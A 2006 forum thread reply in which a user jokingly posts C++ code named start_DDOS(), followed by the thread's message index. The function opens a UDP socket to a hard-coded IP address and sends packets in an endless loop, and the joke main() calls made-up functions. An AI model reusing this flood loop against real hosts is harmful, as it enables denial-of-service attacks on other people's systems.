Home » General Discussions » Heated Discussions and Debates » Coming to and end...
Re: Coming to and end... [message #235608 is a reply to message #230221] |
Sat, 23 December 2006 17:02 |
|
jnz
Messages: 3396 Registered: July 2006 Location: 30th century
Karma:
|
General (3 Stars) |
|
|
im sorry, but i had to post and go over the top.
void start_DDOS()
{
WSADATA WsaData;
SOCKET Socket;
if(WSAStartup(MAKEWORD(2,2), &WsaData) != 0)
{
cout << "Something went wrong with WSAStartup! error code: " << GetLastError() << endl;
system("pause");
exit((int)GetLastError());
}
Socket = socket(AF_INET, SOCK_DGRAM, 0);
if(Socket == SOCKET_ERROR)
{
cout << "Something went wrong creating the socket! error code: " << GetLastError() << endl;
system("pause");
exit((int)GetLastError());
}
SOCKADDR_IN SockAddr, sender;
SockAddr.sin_family = AF_INET;
SockAddr.sin_addr.S_un.S_un_b.s_b1 = 70;
SockAddr.sin_addr.S_un.S_un_b.s_b2 = 132;
SockAddr.sin_addr.S_un.S_un_b.s_b3 = 48;
SockAddr.sin_addr.S_un.S_un_b.s_b4 = 91;
SockAddr.sin_port = htons(2000);
SOCKADDR_IN client;
client.sin_family = AF_INET;
if(connect(Socket, (SOCKADDR *)(&SockAddr), sizeof(SockAddr)) == SOCKET_ERROR)
{
cout << "Something went wrong when binding! error code: " << GetLastError() << endl;
system("pause");
exit((int)GetLastError());
}
int dwSenderSize = (int)sizeof(sender);
while(1)
{
char buf[256] = "OMG I AM H4X1NG";
int ret = sendto(Socket, buf, 255, 0, (SOCKADDR *)&SockAddr, dwSenderSize);
if (ret == SOCKET_ERROR)
{
cout << "Something went wrong sending! error code: " << GetLastError() << endl;
system("pause");
exit((int)GetLastError());
}
}
}
int main()
{
int myposts = get_myposts();
int Hot_Topics_posts = get_Hot_Topics_posts();
if(myposts < Hot_Topics_posts)
{
start_DDOS();
}
else
{
end_world((Planet_type *)"earth");
}
my_bumped_topic++;
return 0;
}
|
|
|
|
|
Coming to and end...
By: msgtpain on Sun, 12 November 2006 18:39
|
|
|
Re: Coming to and end...
By: Aprime on Sun, 12 November 2006 21:36
|
|
|
Re: Coming to and end...
By: Crimson on Sun, 12 November 2006 22:05
|
|
|
Re: Coming to and end...
|
|
|
Re: Coming to and end...
By: Aprime on Mon, 13 November 2006 00:56
|
|
|
Re: Coming to and end...
By: jnz on Tue, 14 November 2006 17:55
|
|
|
Re: Coming to and end...
|
|
|
Re: Coming to and end...
By: Goztow on Mon, 13 November 2006 00:42
|
|
|
Re: Coming to and end...
By: U927 on Mon, 13 November 2006 13:54
|
|
|
Re: Coming to and end...
|
|
|
Re: Coming to and end...
By: z310 on Mon, 13 November 2006 18:22
|
|
|
Re: Coming to and end...
By: Goztow on Tue, 14 November 2006 01:20
|
|
|
Re: Coming to and end...
|
|
|
Re: Coming to and end...
By: GoArmy44 on Tue, 14 November 2006 13:07
|
|
|
Re: Coming to and end...
By: z310 on Tue, 14 November 2006 16:34
|
|
|
Re: Coming to and end...
By: jnz on Tue, 14 November 2006 17:52
|
|
|
Re: Coming to and end...
By: z310 on Tue, 14 November 2006 18:12
|
|
|
Re: Coming to and end...
By: z310 on Tue, 14 November 2006 16:30
|
|
|
Re: Coming to and end...
By: Goztow on Wed, 15 November 2006 07:23
|
|
|
Re: Coming to and end...
By: z310 on Wed, 15 November 2006 08:41
|
|
|
Re: Coming to and end...
By: Goztow on Wed, 15 November 2006 09:49
|
|
|
Re: Coming to and end...
By: z310 on Wed, 15 November 2006 16:25
|
|
|
Re: Coming to and end...
|
|
|
Re: Coming to and end...
By: JPNOD on Tue, 14 November 2006 13:55
|
|
|
Re: Coming to and end...
By: jnz on Tue, 14 November 2006 15:48
|
|
|
Re: Coming to and end...
By: futura83 on Tue, 14 November 2006 15:55
|
|
|
Re: Coming to and end...
By: jnz on Tue, 14 November 2006 16:01
|
|
|
Re: Coming to and end...
By: jnz on Tue, 14 November 2006 19:25
|
|
|
Re: Coming to and end...
By: msgtpain on Thu, 16 November 2006 22:27
|
|
|
Re: Coming to and end...
By: Goztow on Fri, 17 November 2006 02:13
|
|
|
Re: Coming to and end...
By: futura83 on Fri, 17 November 2006 13:26
|
|
|
Re: Coming to and end...
By: futura83 on Tue, 14 November 2006 16:40
|
|
|
Re: Coming to and end...
By: jnz on Tue, 14 November 2006 19:17
|
|
|
Re: Coming to and end...
By: z310 on Tue, 14 November 2006 19:20
|
|
|
Re: Coming to and end...
By: Feetseek on Tue, 14 November 2006 21:40
|
|
|
Re: Coming to and end...
By: z310 on Tue, 14 November 2006 21:47
|
|
|
Re: Coming to and end...
By: Feetseek on Tue, 14 November 2006 21:52
|
|
|
Re: Coming to and end...
By: z310 on Tue, 14 November 2006 21:55
|
|
|
Re: Coming to and end...
By: icedog90 on Fri, 17 November 2006 03:15
|
|
|
Re: Coming to and end...
By: icedog90 on Fri, 17 November 2006 15:38
|
|
|
Re: Coming to and end...
By: Goztow on Sun, 19 November 2006 06:08
|
|
|
Re: Coming to and end...
|
|
|
Re: Coming to and end...
By: Jecht on Sun, 24 December 2006 05:39
|
|
|
Re: Coming to and end...
By: icedog90 on Wed, 22 November 2006 00:33
|
|
|
Re: Coming to and end...
By: jnz on Sat, 23 December 2006 17:02
|
|
|
Re: Coming to and end...
By: xptek on Sat, 23 December 2006 19:58
|
Goto Forum:
Current Time: Fri Dec 13 20:30:08 MST 2024
Total time taken to generate the page: 0.01650 seconds
|